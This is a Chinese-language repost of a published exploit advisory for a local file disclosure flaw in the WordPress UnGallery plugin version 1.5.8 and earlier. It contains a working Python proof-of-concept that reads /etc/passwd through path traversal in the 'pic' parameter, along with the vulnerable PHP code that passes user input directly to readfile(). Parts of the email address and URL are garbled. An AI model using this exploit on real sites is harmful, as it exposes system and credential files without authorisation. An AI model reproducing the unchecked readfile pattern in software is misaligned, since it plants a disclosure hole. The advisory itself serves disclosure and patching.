标题: WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability 作者: Miroslav Stampar (miroslav.stampar(at)gmail测试数据 @stamparm) 下载地址: http://downloads.wordpress.org/plugin/ungallery.1.5.8.zip 已测试版本: 1.5.8 --- 测试方法 --- #!/bin/python import urllib2 FILEPATH = "/etc/passwd" req = urllib2.urlopen(" http://HdhCmsTest2cto测试数据 /wp-content/plugins/ungallery/source_vuln.php?pic=..%s" % FILEPATH) print "Filepath: '%s'" % FILEPATH print "Content: %s" % repr(req.read()) --------------- Vulnerable code --------------- if ($_GET['pic']) { $filename = $_GET['pic']; $len = filesize($filename); $lastslash = strrpos($filename, "/"); $name = substr($filename, $lastslash + 1); header("Content-type: image/jpeg;\r\n"); header("Content-Length: $len;\r\n"); header("Content-Transfer-Encoding: binary;\r\n"); header('Content-Disposition: inline; filename="'.$name.'"'); // Render the photo inline. readfile($filename); }
查看更多关于WordPress插件UnGallery <= 1.5.8本地文件泄露缺陷及的详细内容...